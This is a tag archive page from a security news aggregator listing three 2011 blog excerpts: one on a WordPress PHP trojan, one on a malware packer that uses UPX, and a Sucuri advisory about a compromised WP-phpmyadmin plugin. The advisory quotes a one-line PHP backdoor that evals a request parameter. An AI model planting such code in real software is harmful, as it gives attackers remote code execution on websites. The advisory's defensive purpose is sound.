code snippet | DataProtectionCenter.com

Troj/PHPShll-B: Malware injects itself into WordPress installations

19

Sep

2011

On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friend’s websites. When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C. So, I investigated a […]

Category General Written by Naked Security - Sophos 0 Comments

Malware packer integrates with UPX

28

Jun

2011

Recently while I was analyzing a bunch of samples packed by custom packers, one of them struck me as a bit different than any others I saw before. At first glance, the outer layer of packing is a UPX stub, which is commonly used in malware. Especially when combined with a custom packer, UPX can […]

Category General Written by Microsoft Malware Protection Center 0 Comments

WP-phpmyadmin WordPress plugin – Delete it now

23

Jun

2011

If you are using the WP-phpmyadmin WordPress plugin, delete it now. We are seeing multiple sites getting hacked through it and we are investigating what is going on. On all the sites we’ve analyzed, the following code was found inside the wp-phpmyadmin/phpmyadmin/upgrade.php file: <?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?> This is not part of the plugin, and should be removed […]

Category Security Written by Sucuri 0 Comments

The Latest in IT Security

Posts Tagged ‘code snippet’

Troj/PHPShll-B: Malware injects itself into WordPress installations

Malware packer integrates with UPX

WP-phpmyadmin WordPress plugin – Delete it now

Categories

Featured

Archives

Latest Comments

About Us

Contact Us